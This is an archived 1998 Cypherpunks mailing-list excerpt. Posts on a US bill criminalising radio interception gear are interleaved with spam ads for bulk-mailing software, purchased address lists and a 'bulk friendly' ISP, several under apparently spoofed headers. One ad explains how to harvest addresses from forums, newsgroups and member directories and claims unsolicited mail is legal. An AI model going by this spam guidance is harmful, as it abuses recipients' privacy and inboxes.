Received: from  relay17.mail.aol.com (relay17.mail.aol.com [172.31.106.71]) by air15.mail.aol.com (v37.8) with SMTP; Sat, 10 Jan 1998 18:46:34 -0500
Received: from relay17.mx.aol.com (sdn-ts-043txfwoRP05.dialsprint.net [206.133.153.120])
	  by relay17.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id SAA00988;
	  Sat, 10 Jan 1998 18:45:09 -0500 (EST)
From: XstudmanXX@aol.com
Received: from x2see4uooh@aol.com by x2see4uooh@aol.com (8.8.5/8.6.5) with SMTP id GAA04408 for <x2see4uooh@aol.com>; Sat, 10 Jan 1998 18:49:17 -0600 (EST)
To: x2see4uooh@aol.com
Message-ID: <299703123654.GGA18155@blahblahblah.com>
Date: Sat, 10 Jan 98 18:49:17 EST
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Reply-To: x2see4uooh@aol.com
X-PMFLAGS: 32110291 3
X-UIDL: 0132569874a56kla5x357xex534a5s6d
Comments: Authenticated sender is <x2see4uooh@aol.com>
Subject: #Advertise Your Business To Millions By Email With R.A.F.)
 






----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <roargi@aol.com>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.73.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
Date: Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject: I saw your AOL classified ad,
Reply-to: conserve@micro-net.com
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415  
Subject: #1Advertise Your Business To Millions By Email With R.A.F)















----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <tresd@compusreve>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.68.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415           
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)                                                       
</P><P ALIGN=CENTER></FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></B>
                           
  
</P><P ALIGN=LEFT>

                                           




<FONT  COLOR="#000000" BACK="#fffffe" SIZE=3>

----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay03a.mail.aol.com (relay03a.mail.aol.com [172.31.160.3]) by air03a.mail.aol.com (v37.8) with SMTP; Sat, 17 Jan 1998 02:49:56 -0500
Received: from multi38.netcomi.com (multi38.netcomi.com [204.58.155.238])
	  by relay03a.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id CAA21650;
	  Sat, 17 Jan 1998 02:49:54 -0500 (EST)
Received: from SOFTWINU (ts1p5.vh.net [207.204.249.25]) by multi38.netcomi.com (8.8.7/8.7.3) with SMTP id BAA04667; Sat, 17 Jan 1998 01:49:50 -0600
Message-Id: <199801170749.BAA04667@multi38.netcomi.com>
From: 1112_man@thecard.com
Date: Sat, 17 Jan 1998 02:47:23 PST
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)<FONT  COLOR="#0f0f0f" SIZE=3>

</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Fri, 6 Mar 1998 20:09:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Crypto as contraband
Message-ID: <19980306231001.53809@die.com>
MIME-Version: 1.0
Content-Type: text/plain


Subject: Re: [LEGAL] Crypto as Contraband?
Reply-To: die@die.com
References: <v03102809b1265edd4202@[207.167.93.63]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.85
In-Reply-To: <v03102809b1265edd4202@[207.167.93.63]>; from Tim May on Fri, Mar 06, 1998 at 06:20:39PM -0800

On Fri, Mar 06, 1998 at 06:20:39PM -0800, Tim May wrote:
> 
> (Even with guns, in the U.S., there have historically been
> "grandfatherings" of existing guns. Not always, as with certain machine
> guns. And not with gold, which was declared contraband by the Reichsfuhrer
> in 1933.)
> 
> Could possession of PGP be still legal, but _use_ declared illegal?
> 
> (Not addressing the First Amendment issues, which are even stronger, but
> just the issue of retroactive contrabanding of something which was acquired
> legally, and by hundreds of thousands of law-abiding citizens.)
> 

	The House has just done this yesterday as mentioned in several
items posted to this very list:


	From HR2369, the Wireless Communications Privacy Enchancement Act
of 1998, passed by the House 414 to 1....



 "(4) Any person who manufactures, assembles, modifies, imports, exports,
 sells, or distributes any electronic, mechanical, or other device or
 equipment, knowing or having reason to know that the device or equipment ..."

 .... clause concerning satellite  piracy gear omited .....

 " , or is intended for any receipt, interception, divulgence, publication, or
 utilization of any communication in violation of subsection (a), shall
 be fined not more than $500,000 for each violation, or imprisoned for
 not more than 5 years for each violation, or both. For purposes of all
 penalties and remedies established for violations of this paragraph, the
 prohibited activity established herein as it applies to each such device
 shall be deemed a separate violation."

Subsection a: 

 " ....... No person not being authorized by the sender shall
 intentionally intercept any radio communication *or* divulge or publish
 the existence, contents, substance, purport, effect, or meaning of such
 intercepted communication to any person..........." 

	[note that *and* was changed by this bill to *or*, making interception
itself criminal]

	The only exception being :

 "Nothing in this subsection prohibits an interception or disclosure of a
  communication as authorized by chapter 119 of title 18, United States
  Code." 
     	  [which covers broadcast, ham, marine, aviation. governmental,
and communications readily accessible to the general public, whatever
that means]


	While this doesn't exactly retroactively ban *possession* of
radio gear capable of intercepting banned radio communications, it
provides extremely stiff felony level penalties for manufacturing,
assembling, modifying, importing, exporting, selling, or distributing
any radio receiving gear that might be construed to be intended for
receipt or interception of any radio communications not on the allowed
list.  And these penalties apply to each individual sale.

	Thus selling an old scanner at a Saturday morning hamfest to a
stranger for cash - a scanner legally purchased from Radio Shack in the
era  before cell phone frequencies were outlawed on scanners -  could
conceivably result in a $500,000 fine and a five year jail term.  And
Lord knows what horrible penalties could be assessed against innocent
people selling the sort of oddball specialized communications gear and
test equipment that are the stock in trade of many of the more
interesting ham fests and swapmeets [MIT's monthly fleas for example].

	Perhaps such informal personal sales will never be prosecuted,
but most sales of gear at hamfests and the like are anonymous cash
transactions between total strangers with every possiblity that the guy a
table over with the video camera is filming your sale for evidence.

	And for those who like to hack, tinkering quietly in their
basements with communications monitoring and decoding software and
hardware, manufacture and assembly have been defined in other federal
cases to include merely writing software for one's own use. Surely this
would apply to creating cryptanalysis software for any form of radio
communications at all, since it is not legal to intercept any radio
communications that are "scrambled or encrypted".  And there is no
exception made for research and development or academic purposes.

	So yes, they have done at least as bad a thing to people who
merely want to tinker with their radios and occasionally explore what is
out there in the ether by passively and in private receiving radio
signals as they have to gun owners, who at least possess a weapon
capable of doing some serious harm.  And there is not a single sentance
in the legislation providing any kind of encouragement for the use of
cryptography to protect the privacy of openly broadcast signals
receivable for miles around, let alone mandating it.

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 55459456@msn.com
Date: Sat, 7 Mar 1998 03:52:03 -0800 (PST)
To: Members@aol.com
Subject: Advertise Your Business To MIllions With Direct Email Marketing !!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE>
</P><P ALIGN=CENTER><FONT  COLOR="#00ffff" SIZE=6><B>Bulk Email Programs<FONT  COLOR="#00ffff" SIZE=5>
</FONT><FONT  COLOR="#ff0000" SIZE=4>6 Major Programs On ONE CD ONLY $600.00 !!!!!!!

</FONT><FONT  COLOR="#0000ff" SIZE=4>All these programs together will cost of over $1600.00 at retail price and are available until 02/28/98 for this price.</FONT><FONT  COLOR="#ff0000" SIZE=4>
</P><P ALIGN=LEFT>
Please keep in mind that none of these programs are demos they are full version programs.
</P><P ALIGN=CENTER>
</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=4>STEALTH MASS MAILER (FULL VERSION)
</FONT><FONT  COLOR="#8080ff" SIZE=3>SEND BULK EMAIL AT THE RATE OF 200,000/HOUR ( Retail $399.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

TURBO EMAIL LIST MANAGER
</FONT><FONT  COLOR="#8080ff" SIZE=3>POWERFUL EMAIL DATABASE LIST MANAGER  (Retail 299.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

HURRICANE EMAIL ADDRESS COLLECTOR
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM WEB SITES (Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

GEO SNAKE
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES BASED ON CITY/STATE
(Retail $199.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

NEWS SLEUTH
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM NEWSGROUP POSTS 
(Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>


EMAIL PRO
</FONT><FONT  COLOR="#8080ff" SIZE=3>EMAIL ADDRESS LIST MANAGER ( Retail $195.00 )

</P><P ALIGN=CENTER></FONT><FONT  COLOR="#ff0000" SIZE=3>YOU GET ALL 6 PROGRAMS ON CD FOR ONLY $600

</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=3>TO ORDER PLEASE CALL (213)757-9032 FOR COMPLETE ORDERING DETAILS.</FONT><FONT  COLOR="#000000" SIZE=3></B>epartment at (213) 757-9032 <B>For orders for next day delivery please add $15.00 to your order and priority mail please add $3.00 to your order.</B>

<FONT  COLOR="#ffff00" SIZE=3>I<FONT  COLOR="#ffff00" SIZE=4>f you are interested in becomming a vendor for our software please email us at Support26@juno.com for complete details.</FONT><FONT  COLOR="#000000" SIZE=3>


 Remove Here 



<FONT  COLOR="#0f0f0f" BACK="#fffffe" SIZE=3><B>
----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay17.mail.aol.com (relay17.mail.aol.com [172.31.106.71]) by air15.mail.aol.com (v37.8) with SMTP; Sat, 10 Jan 1998 18:46:34 -0500
Received: from relay17.mx.aol.com (sdn-ts-043txfwoRP05.dialsprint.net [206.133.153.120])
	  by relay17.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id SAA00988;
	  Sat, 10 Jan 1998 18:45:09 -0500 (EST)
From: XstudmanXX@aol.com
Received: from x2see4uooh@aol.com by x2see4uooh@aol.com (8.8.5/8.6.5) with SMTP id GAA04408 for <x2see4uooh@aol.com>; Sat, 10 Jan 1998 18:49:17 -0600 (EST)
To: x2see4uooh@aol.com
Message-ID: <299703123654.GGA18155@blahblahblah.com>
Date: Sat, 10 Jan 98 18:49:17 EST
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Reply-To: x2see4uooh@aol.com
X-PMFLAGS: 32110291 3
X-UIDL: 0132569874a56kla5x357xex534a5s6d
Comments: Authenticated sender is <x2see4uooh@aol.com>
Subject: #Advertise Your Business To Millions By Email With R.A.F.)
 






----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <roargi@aol.com>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.73.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
Date: Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject: I saw your AOL classified ad,
Reply-to: conserve@micro-net.com
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415  
Subject: #1Advertise Your Business To Millions By Email With R.A.F)















----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from candy.micro-net.net (candy.micro-net.net [207.182.64.2])
	  by mrin45.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id BAA05102 for <tresd@compusreve>;
	  Sat, 11 Oct 1997 01:40:12 -0400 (EDT)
Received: from micro-net.com (ip130.columbus4.oh.pub-ip.psi.net [38.27.68.130])
	by candy.micro-net.net (8.8.7/8.8.6/bspm1.13+rchk1.13) with SMTP id BAA05191
	for <roargi@aol.com>; Sat, 11 Oct 1997 01:40:02 -0400 (EDT)
From: timothy drobnick <conserve@micro-net.com>
To: roargi@aol.com
Subject:#1 Bulk Email Software(Advertise To Millions Free)
Comments: Authenticated sender is <conserve@micro-net.com>
Received: from micro-net.com (micro-net.com [000.000.000.000]) by micro-net.com (0.0.0./0.0.0.) with SMTP id AAA000000 for <conserve@micro-net.com>; Sat, 11 Oct 1997 1:34:14 -0500 (EST)
Message-Id: 0000000000.AAA000@micro-net.com
X-UIDL: 41489129262628956441837275925415           
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)                                                       
</P><P ALIGN=CENTER></FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></B>
                           
  
</P><P ALIGN=LEFT>

                                           




<FONT  COLOR="#000000" BACK="#fffffe" SIZE=3>

----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
Received: from  relay03a.mail.aol.com (relay03a.mail.aol.com [172.31.160.3]) by air03a.mail.aol.com (v37.8) with SMTP; Sat, 17 Jan 1998 02:49:56 -0500
Received: from multi38.netcomi.com (multi38.netcomi.com [204.58.155.238])
	  by relay03a.mail.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with ESMTP id CAA21650;
	  Sat, 17 Jan 1998 02:49:54 -0500 (EST)
Received: from SOFTWINU (ts1p5.vh.net [207.204.249.25]) by multi38.netcomi.com (8.8.7/8.7.3) with SMTP id BAA04667; Sat, 17 Jan 1998 01:49:50 -0600
Message-Id: <199801170749.BAA04667@multi38.netcomi.com>
From: 1112_man@thecard.com
Date: Sat, 17 Jan 1998 02:47:23 PST
Subject: #1 Advertise Your Business To Millions By Email With R.A.F)<FONT  COLOR="#0f0f0f" SIZE=3>

</FONT></FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3>
</PRE></HTML>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: datasystem@mailcity.com
Date: Sat, 7 Mar 1998 03:28:49 -0800 (PST)
To: Entrepreneur@cygnus.com
Subject: Free Email Software!
Message-ID: <199803071128.DAA26280@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
                         Advertising  Secrets  Exposed !
Are you having a difficult time trying to promote your business on the Internet?
Have you posted classified ads with little or no response?

Well, if you'd like to know something that you could use with your present
business to make it Explode!

I have the answer to your business growth problems. Free Email Software!

Everybody's talking about Email Marketing!
A gold mine for those who can take advantage of mass Email Marketing.

Just imagine for a minute what this will mean to your business, being able to
reach thousands of new prospects daily, with no cost to you.

We will give you a new software package called Freedom, absolutely Free, to
use in your business.

Now you will have, a do it yourself method of online advertising, that up till now
only the professional Internet Marketer had access to. And have a powerful
potential to target millions with simple click of your mouse.

And if you need fresh Email addresses, we have them on, 3.5 IBM disk. The
best prices on the Internet.

100,000 Addresses Oppty Seekers Only $29.95 Includes shipping and handling.
200,000 Addresses Oppty Seekers Only $39.95 Includes shipping and handling.
400,000 Addresses Oppty Seekers Only $49.95 Includes shipping and handling.

And for the serious Internet Marketer, 25 million plus!! Our company has one of
the largests databases on the Internet with over 25 million Email Addresses,
these are split up in many different categories, and rotated frequently, giving
you new addresses to choose from each time. This service allows you to access
our database of Email Addresses as much as you want, from our website. All
for only $195. No need to ever gather or purchase Email addresses again!!
But because of our special internet promotion for the month of Mar20/98
you can purchase our E-Mail software program including 25 Million E-Mail
addresses, and including full time tech support, telephone number, for only
$95. for all orders received before Mar20/98


PRINT AND FILL OUT ORDER FORM BELOW
 
Yes! Please Rush Me Fresh Email Addresses, And My FREE Email Software.

Name______________________________________________________

Address____________________________________________________

City_________________________________State__________________
 
Zip____________________________Email________________________

Types Of Addresses Opportunity Seekers (   )  General  (   )

100,000 Addresses $29.95 Includes shipping&handling and Freedom Software.
200,000 Addresses $39.95 Includes shipping&handling and Freedom Software.
400,000 Addresses $49.95 Includes shipping$handling and Freedom Software.

25Million Addresses$95 From database Includes S&H and Freedom Software.
And full time tech support, by telephone, for all orders received by Mar20/98

Freedom Software Only. Send $10. To cover S&H. IBM 3.5 Floppy disk.

Bonus: Orders received before, Mar20/98 will receive another Software program
Free, called "CHECKER" that allows you to receive checks by Fax, Email, and Phone.
Sold over the Internet for $129. Free with your purchase of any or the above products!
Never lose another impulse sale again, for lack of, a credit card, or the slowness
of US mail.

Also "FREE Lifetime 5 Page Commercial Web Site with Free Autoresponder and lifetime
E-mail address. No adult material allowed.

FREE report The 10 best homebased Online business, Creating and Selling on Line!

FREE report Internet Profits and Search Engines Secrets!


 
Payment: Check (  )  Money Order (  )  Cashier's CK (  )  Other (  )  U.S Funds 

Send Order Form Along With Payment: To
   
                                            REV TECH MARKETING
                                              2172 Kanoy ave
                                        Thomasville N.C 27360-8733
                                                   U.S.A.
                                                
            Mail End.                                           


                                     
      






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Sat, 7 Mar 1998 01:41:05 -0800 (PST)
To: Dave Emery <die@die.com>
Subject: RE: Crypto as contraband
In-Reply-To: <19980306231001.53809@die.com>
Message-ID: <Pine.LNX.3.96.980307043102.27274A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 6 Mar 1998, Dave Emery wrote:
> 	So yes, they have done at least as bad a thing to people who
> merely want to tinker with their radios and occasionally explore what is
> out there in the ether by passively and in private receiving radio
> signals as they have to gun owners, who at least possess a weapon
> capable of doing some serious harm.  And there is not a single sentance
> in the legislation providing any kind of encouragement for the use of
> cryptography to protect the privacy of openly broadcast signals
> receivable for miles around, let alone mandating it.

Hmm.. the wording of the bill uses the word "communication" .. I wonder
just what this is supposed to mean. Any ideas on what this means? Would
this be deliberate transmission of a signal, or would EMR monitoring
be covered by this too.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..subordination of one sex to the other is wrong in itself, and now
one of the chief hindrances to human improvement.." John Stuart Mill
"The Subjection of Women"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNQEUpwKEiLNUxnAfAQFllAP/VgdQpjerjenKUCjif58Jjoh718QKlf56
FvAyquQW+Q8TErWC5TE+H6QODMoNPJ645XkTN9M91qqpMCbWHvWDu6PpvDt58qa8
GVPOKtFBaUSGJuI6ph2GGI8ypciBTouDgnloCXLK/9be/lk0+BjcDBDRFPuqsc4k
TG9p2lv6nTk=
=WB2y
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sat, 7 Mar 1998 07:22:40 -0800 (PST)
To: David Honig <honig@otc.net>
Subject: Re:
In-Reply-To: <3.0.5.32.19980306121618.007b7a10@otc.net>
Message-ID: <199803071522.KAA11429@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980306121618.007b7a10@otc.net>, on 03/06/98 
   at 12:16 PM, David Honig <honig@otc.net> said:

>Politicians still think they're relevant...

>Given that this bill passed 414-1, it'll likely be US law soon.

>Does this mean that law enforcement will now need a judicial wiretap
>order to go scanning for evidence to get a warrant?

Don't you know that an exemption clause for the FED's is standard trailer
on all Bill's passed by congress.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/esecure.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2: Not just another pretty program loader!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNQFYlY9Co1n+aLhhAQHBtQP9EDXJnXESt5cwwq/6DTpB06Yg2uCVeZe2
BUmF3BpzLPnW501usHoz/tTbHGsJdW2uSOFetWUyrljCY32mUxK6+kKkvv1zPHFG
Pa5zeMvlDeBaGbbdtmBP+3adMuBpfghke9fysFwX8oJIUsRpQ42AZGum8sE8Ncpy
LHCfCzCdZTs=
=MKPu
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@chemistry.ohio-state.edu>
Date: Sat, 7 Mar 1998 13:29:34 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: Cannot send message within 5 days
Message-ID: <199803072008.PAA26003@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Mon, 2 Mar 1998 14:14:28 -0500 (EST)
from ts35-10.homenet.ohio-state.edu [140.254.114.193]

   ----- The following addresses had permanent fatal errors -----
<Remove@rmjent.com>

   ----- Transcript of session follows -----
451 <Remove@rmjent.com>... rmjent.com: Name server timeout
Message could not be delivered for 5 days
Message will be deleted from queue


Reporting-MTA: dns; chemistry.mps.ohio-state.edu
Arrival-Date: Mon, 2 Mar 1998 14:14:28 -0500 (EST)

Final-Recipient: RFC822; Remove@rmjent.com
Action: failed
Status: 4.4.7
Last-Attempt-Date: Sat, 7 Mar 1998 15:08:01 -0500 (EST)


To: Remove@rmjent.com
From: cypherpunks@toad.com
Date: Wed, 02 Jan 1980 01:47:53 -0500
Reply-To: cypherpunks@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nuapuosao29@iddqd.org
Date: Sat, 7 Mar 1998 15:39:17 -0800 (PST)
To: nuapuosao29@iddqd.org
Subject: Bulk Email For Profit !!
Message-ID: <199803072076CAA24906@post.bistek.net.tr>
MIME-Version: 1.0
Content-Type: text/plain


If you would like to be removed from our
list(s), hit reply and type remove in the
subject of your letter.


*********************************************************

        
            MAIL THOUSANDS OF EMAIL MESSAGES
              PER HOUR - NO KIDDING !!

          SEND YOUR EMAIL MESSAGES OUT, AT
         1,000's MESSAGES / HOUR (28.8K modem)

           YES, 1,000's  Of Messages An Hour

******************************************************

	68+  MILLION  EMAIL  ADDRESSES

           ******** $100.00 *******

******************************************************

  YOU'LL RECEIVE 2 HIGH-SPEED EMAIL SOFTWARE PROGRAMS

Introducing...."FLOODGATE BULK EMAIL LOADER" 
        AND...."GOLDRUSH STEALTH MASS MAILER"

This is the same software that all bulk emailing services use!

********************************************************
  
	TO COMPLIMENT OUR PACKAGE............
WE NOW MAKE AVAILABLE...........A BULK FRIENDLY ISP !!!
	
	See Our Order Form Below For Details

*********************************************************

	GET A "BULK FRIENDLY" WEB HOST ACCOUNT
		FROM US FOR ONLY

		$45.00 PER MONTH*

	*($100 one-time setup fee additional)

*********************************************************

Floodgate Bulk Email Loader Version 6.0 AND
Goldrush Stealth Mass Mailer Version 3.215
for Windows 95 and Windows 3.1 now Supports 17 
(really more with the free form filter) File Formats

---------------------------------------------------------


SEND OUT 20,000+ MARKETING LETTERS EVERY SINGLE DAY!

Or...every few days. In fact, when I send out just a few thousand marketing letters each day, it doesn't take long before I'm completely swamped with email inquiries and phone calls. This is very easy to do. And each one of these bulk mailings costs me nothing. I can teach you how to do this and provide you with the tools you'll need.

If you've got a good marketing letter, I'll show you how to open the floodgates. You'll be deluged with inquiries, leads, and real sales, using nothing but email alone.

Writing a good marketing letter is not easy. I often have to rewrite my marketing letters a half dozen times before I get the results I'm looking for. But once you have a good letter, as you probably know, you can use the same letter over and over again, predictably and consistently, closing sales, week after week, month after month.

It takes me about one hour to send my marketing letter to THOUSANDS of fresh email addresses. I can do this, thanks to a Windows program I use. It's called Floodgate and Goldrush Stealth Mass Mailer. It's a bulk email loader and an email software program. If you're interested in electronic marketing, you should know about these programs.

PROGRAM #1: FLOODGATE FOR WINDOWS

The Floodgate Bulk Email Loader imports simple text files that anyone can download from CompuServe, Prodigy, Delphi Genie, or the Internet. These text files contain classified ads, forum messages, or data from the member directory. Each of these files is filled with email addresses.

Floodgate is designed to read these files and strip out the email addresses. It then sorts the addresses, removes any duplicates, and formats them into an output file, with 10, 20 or 30 addresses per line. This is all done in one simple step. Just point and click.

You'll need either a Windows based Internet account or an America On-line account to send out your marketing letters. Neither AOL nor the Internet charges to send email. Send your letter to 1,000 people or 10,000 people -- the cost is always the same. NOTHING!

NEW! PREPARE A MAILING OF 50,000+ 
IN LESS THAN A 1/2 HOUR

If you open an Internet account, you can send each letter to 20,000+ people. The new Floodgate now directly writes distribution lists. Some people are always collecting new addresses, but if you publish a newsletter or adsheet, you'll be using the same addresses over and over again. That's real power! When using addresses you've previously collected, you can press a few buttons and prepare a mailing of 50,000+ in less than a half hour.

(To get a list of all the Internet access providers in your local calling area goto: http://thelist.com and click on your area code.)

The Floodgate Users Guide will teach you, step by step, how to download the right files, how to strip the addresses, and finally, how to cut and paste the formatted addresses into your marketing letter. Or, if you have an Internet account, how to create distribution lists. One you've done this a few times you won't even have to think. It's that simple!

FOR THE BRAVE & DARING: PUSHING TECHNOLOGY TO ITS LIMITS

As you may know, the practice of sending unsolicited email is usually frowned upon, and most service providers have rules against it. But, like jay-walking, there is little enforcement. It's not illegal. If someone tells you that it is, ask them to provide the citation (and don't let them give you some nonsense about faxes - that's not email). They can't do it because it's not there. Sometimes, when a lot of people complain, I get a warning letter. And that's about it.

About 1 in 200 will write back and tell me, "take me off the list", which I can do, thanks to Floodgates Remove List feature. Many people reply back thanking me for sending them my informative letter. That's always nice. Most people though, just reply and say, "send me more info." In this way, it usually takes me two or three letters to close a sale.

The Floodgate Users Guide will provide you with proven formats for writing a successful marketing letter. You'll test and rewrite, test and rewrite. Then, once you've got it, just push a few buttons, and open the floodgates!!!

THE FLOODGATE BULK EMAIL LOADER CURRENTLY SUPPORTS 17+ FILE FORMATS

1. CompuServe Classifieds: Send your marketing letter to everyone who is running a classified ad. I'll teach you how to download all the classifieds from any single ad category. This is one of the most responsive list of buyers. They check their email every day and they're already in business.

2. America On-line Classifieds: Download 1,000 addresses in 15 minutes. These are excellent lists for business to business sales.

3. CompuServe Forums: You can join a forum and download hundreds of forum messages in a matter of minutes.

4. America On-line Forums: Choose from dozens of forums. All good targeted lists.

5. Prodigy Forums: Prodigy allows you to easily export any group of forum messages. More targeted lists.

6. Internet Newsgroups: These are all targeted lists. You'll be able to send your marketing letter to everyone who posts a message in any newsgroup. Easily collect 1,000's of addresses per hour.

7. America On-line Member Directory: Most member directories only allow you to search by city and state. With AOL, you can search by business type, hobbies, computer type, etc. This is the gem of all
member directories. Build huge targeted lists.

8. CompuServe Member Directory: This is a major resource. If you're willing to target your mailing to a single city, you can collect about 1,000 email addresses an hour.

9. Delphi Member Directory: The Delphi member directory allows you to search for people based on key words. These are good targeted mailing lists. A single search can easily generate 5,000 addresses.

10. Genie Member Directory: Similar to the CompuServe member directory, only you can download names much quicker. You can easily pull hundreds of thousands of addresses out of each of these member directories.

11. CompuServe File Cabinet: If you run classified ads, and save the responses in the CIM file cabinet, you'll be able to easily reuse these addresses. You can send your marketing letter to everyone in any single folder. Build master lists and clean UP your hard drive.

12. Free Form: If you have a text file with email addresses that floodgate does not support, chances are the Free Form filter will be just what you need. Just enter a key word to search for.

